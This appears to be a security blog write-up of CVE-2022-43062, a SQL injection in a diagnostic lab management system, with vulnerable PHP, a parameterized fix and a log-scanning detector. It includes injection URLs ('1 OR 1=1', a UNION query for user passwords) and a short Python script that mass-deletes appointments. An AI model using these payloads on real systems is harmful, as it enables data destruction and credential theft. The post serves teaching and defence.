Security flaws in healthcare web applications can be disastrous, exposing sensitive data and handing attackers complete control of the system. In this post, we take a deep dive into CVE-2022-43062, a critical SQL injection vulnerability found in the Online Diagnostic Lab Management System v1. This write-up explains the bug, walks through code snippets, offers a step-by-step exploit, and links to the original references and documentation.

What is CVE-2022-43062?

CVE-2022-43062 is a security flaw discovered in the Online Diagnostic Lab Management System v1., specifically within the id parameter at /classes/Master.php?f=delete_appointment. The vulnerability allows attackers to inject and execute arbitrary SQL commands, potentially leading to data leaks, database destruction, or complete system compromise.

Affected Product:

Online Diagnostic Lab Management System v1.

Vulnerable Endpoint:
- /classes/Master.php?f=delete_appointment
Param: id

How the Bug Works

The vulnerable code does not properly sanitize the id parameter before using it in a SQL query. As a result, any value supplied through this parameter is directly passed to the database.

Hypothetical Vulnerable PHP Code

// Master.php (function delete_appointment)
$id = $_GET['id'];
$sql = "DELETE FROM appointments WHERE id = $id";
mysqli_query($conn, $sql);

Because $id is interpolated into the query string unescaped, a malicious user can inject arbitrary SQL into the query.

Given the code above, an attacker can manipulate the id parameter. For example:

/classes/Master.php?f=delete_appointment&id=1

The query executed:

DELETE FROM appointments WHERE id = 1

But if someone sends:

/classes/Master.php?f=delete_appointment&id=1 OR 1=1

The query becomes:

DELETE FROM appointments WHERE id = 1 OR 1=1

This instructs the database to delete every row in the appointments table, because 1=1 is always true.

Step 2: Data Extraction with UNION

Suppose the attacker wants to extract usernames and passwords. The id parameter could be replaced with a UNION-based SQL injection payload such as:

/classes/Master.php?f=delete_appointment&id=-1 UNION SELECT 1, user, password FROM users--

If the application echoes query results in its response, a payload like this might dump sensitive data to the attacker. Note that a DELETE statement returns no result set, so a UNION appended to this particular query would not display rows as written; the payload illustrates the general UNION technique rather than a working extraction against this exact endpoint.

Step 3: More Advanced Payloads

Depending on the database privileges and table structure, the attacker could escalate further, such as reading arbitrary tables, running stacked queries (if supported), or even writing to the filesystem.

Example Exploit in Python

This code snippet demonstrates how an attacker could exploit the vulnerability to delete all appointments.

import requests

# target-site is a placeholder host
url = 'http://target-site/classes/Master.php'
payload = {'f': 'delete_appointment', 'id': '1 OR 1=1'}

response = requests.get(url, params=payload)
print('Status:', response.status_code)
print('Response:', response.text)

Warning: Only use this code in authorized pen-testing on systems you own/have permission to test.

Fixing this is straightforward: always use parameterized queries! For example:

$id = $_GET['id'];
// The ? placeholder is bound as an integer ("i"), so the input is sent to the
// database as data and can never change the structure of the statement.
$stmt = $conn->prepare("DELETE FROM appointments WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();

Also validate and sanitize all inputs (here, reject any id that is not a positive integer), and be cautious about letting GET parameters trigger state-changing database actions such as deletes.
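As an added example (not code from the original post or from the project), the same allow-list check for the id parameter, applied retroactively to constructed access-log lines to find earlier injection attempts against this endpoint:

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format) for illustration only.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Nov/2022:20:15:01 +0000] "GET /classes/Master.php?f=delete_appointment&id=17 HTTP/1.1" 200 42
10.0.0.9 - - [03/Nov/2022:20:15:07 +0000] "GET /classes/Master.php?f=delete_appointment&id=1%20OR%201%3D1 HTTP/1.1" 200 42
10.0.0.9 - - [03/Nov/2022:20:15:09 +0000] "GET /classes/Master.php?f=delete_appointment&id=-1%20UNION%20SELECT%201,user,password%20FROM%20users-- HTTP/1.1" 500 0
10.0.0.5 - - [03/Nov/2022:20:16:00 +0000] "GET /classes/Master.php?f=get_appointment&id=17 HTTP/1.1" 200 310
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Allow-list: a plain positive integer, no whitespace, quotes or operators.
ID_RE = re.compile(r'^[1-9][0-9]{0,9}$')


def is_valid_appointment_id(value):
    """Return True only if the id is a plain positive integer."""
    return bool(ID_RE.match(value))


def parse_request(line):
    """Split one log line into ip, timestamp, status, path and the f/id query values."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    params = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes values
    return {
        'ip': m.group('ip'), 'ts': m.group('ts'), 'status': m.group('status'),
        'path': parts.path,
        'f': params.get('f', [''])[0],
        'id': params.get('id', [''])[0],
    }


def find_injection_attempts(log_text):
    """Return (ip, timestamp, decoded id) for delete_appointment requests whose id fails validation."""
    hits = []
    for line in log_text.splitlines():
        req = parse_request(line)
        if not req or req['path'] != '/classes/Master.php' or req['f'] != 'delete_appointment':
            continue
        if not is_valid_appointment_id(req['id']):
            hits.append((req['ip'], req['ts'], req['id']))
    return hits


if __name__ == '__main__':
    for ip, ts, bad_id in find_injection_attempts(SAMPLE_LOG):
        print(f'{ts} {ip} suspicious id={bad_id!r}')
```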

References

- Original CVE record: CVE-2022-43062
- Exploit DB 51388
- OWASP SQL Injection Guide
- GitHub Source for Online Diagnostic Lab Management System

Conclusion

CVE-2022-43062 serves as an urgent reminder: never trust user input and always use prepared statements to interact with a database. If you use the Online Diagnostic Lab Management System v1., patch your code ASAP or restrict public access to these endpoints.

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 14:58:00 UTC